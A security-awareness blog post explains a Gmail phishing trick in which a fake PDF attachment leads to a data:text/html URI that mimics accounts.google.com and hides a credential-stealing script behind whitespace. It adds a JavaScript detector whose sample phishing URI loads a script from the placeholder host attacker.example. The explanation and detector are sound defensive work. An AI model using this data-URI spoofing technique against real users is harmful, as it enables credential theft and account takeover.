Watch out for this sneaky Gmail attack

Wordfence have highlighted a particularly sneaky Gmail phishing attack. Here’s what to look out for …

You receive an email – possibly from a friend or a legitimate contact – with an attachment, like this:

Although it looks genuine, it’s NOT a real attachment. It’s an embedded image crafted to look like a PDF preview, and the image is a hyperlink: when you click it, the link takes you to a fake Google login page …

… that also looks like the real thing. The only clue is in the browser’s address bar:

But that looks genuine too, doesn’t it? It says https://accounts.google.com, etc. The only oddity is the data:text/html prefix, and that’s the gotcha. It’s what’s known as a ‘data URI’, and what it tells the browser is that what follows isn’t a web address to fetch but the content of the page itself, here an HTML document supplied inline as a string of text, in this case a particularly long one. The reassuring https://accounts.google.com… is simply the first part of that text, placed there so it is what you see in the address bar. After a lot of whitespace to push what follows off the screen, you’ll find this …

… the start of a script that opens a new tab containing a functional but fake Gmail login page, one that sends your username and password to the attacker.
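The address-bar check below is an added example, not code from Wordfence or from the original post. It classifies what the address bar holds: a genuine https://accounts.google.com navigation passes, a lookalike host is flagged for checking, and a data: URI whose inline payload opens with a trusted-looking origin, is padded with a long run of whitespace and carries a script tag is called out as the trick described above. The sample URI, its 200-space padding and the host attacker.example are constructed placeholders, not real indicators.

```javascript
// Added example: classify the text in the browser's address bar and flag the
// data: URI trick (fake origin text, whitespace padding, inline <script>).
// SAMPLE_PHISHING_URI is constructed for illustration; attacker.example is a
// placeholder host, not a real indicator.

const SAMPLE_PHISHING_URI =
  'data:text/html,https://accounts.google.com/ServiceLogin?service=mail' +
  ' '.repeat(200) +                                   // pushes the script off-screen
  '<script src="https://attacker.example/login.js"></script>';

const SAMPLE_REAL_URL = 'https://accounts.google.com/ServiceLogin?service=mail';

function classifyAddressBarUrl(address) {
  const addr = address.trim();
  const result = {
    scheme: null,
    isDataUri: false,
    mediaType: null,
    leadingFakeOrigin: null, // origin-looking text at the start of the inline payload
    paddingLength: 0,        // longest whitespace run inside the payload
    hasScript: false,
    verdict: 'ok',
  };

  const m = /^([a-z][a-z0-9+.-]*):/i.exec(addr);
  if (!m) {
    result.verdict = 'no scheme';
    return result;
  }
  result.scheme = m[1].toLowerCase();

  if (result.scheme !== 'data') {
    // A real navigation has a host; the genuine login lives on https://accounts.google.com.
    try {
      const u = new URL(addr);
      result.verdict =
        u.protocol === 'https:' && u.hostname === 'accounts.google.com' ? 'ok' : 'check host';
    } catch (e) {
      result.verdict = 'unparseable';
    }
    return result;
  }

  // data:[<mediatype>][;base64],<data>  -- everything after the comma is page content
  result.isDataUri = true;
  const comma = addr.indexOf(',');
  const header = addr.slice(5, comma === -1 ? undefined : comma);
  result.mediaType = (header.split(';')[0] || 'text/plain').toLowerCase();
  let payload = comma === -1 ? '' : addr.slice(comma + 1);
  if (/;base64/i.test(header)) {
    payload = typeof atob === 'function'
      ? atob(payload)
      : Buffer.from(payload, 'base64').toString('utf8');
  } else {
    try { payload = decodeURIComponent(payload); } catch (e) { /* keep raw text */ }
  }

  // Trusted-looking origin text placed first so it shows in the address bar.
  const origin = /^\s*(https?:\/\/[^\s/?#]+)/i.exec(payload);
  if (origin) result.leadingFakeOrigin = origin[1].toLowerCase();

  // Whitespace padding used to hide what comes after it.
  for (const ws of payload.match(/\s+/g) || []) {
    if (ws.length > result.paddingLength) result.paddingLength = ws.length;
  }

  result.hasScript = /<script[\s>]/i.test(payload) || /\bjavascript:/i.test(payload);

  if (result.leadingFakeOrigin && (result.hasScript || result.paddingLength >= 20)) {
    result.verdict = 'phishing: data URI impersonating ' + result.leadingFakeOrigin;
  } else if (result.mediaType === 'text/html') {
    result.verdict = 'suspicious: inline HTML document in address bar';
  } else {
    result.verdict = 'data URI';
  }
  return result;
}

console.log(classifyAddressBarUrl(SAMPLE_PHISHING_URI).verdict);
console.log(classifyAddressBarUrl(SAMPLE_REAL_URL).verdict);
```

The decisive test is the scheme: a page you can log in to has a host you can check, while a data: URI has no host at all, so any origin-looking text you see in it is part of the attacker's document, not an address.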

According to a comment on Hacker News,

“The attackers log in to your account immediately once they get the credentials, and they use one of your actual attachments, along with one of your actual subject lines, and send it to people in your contact list.”

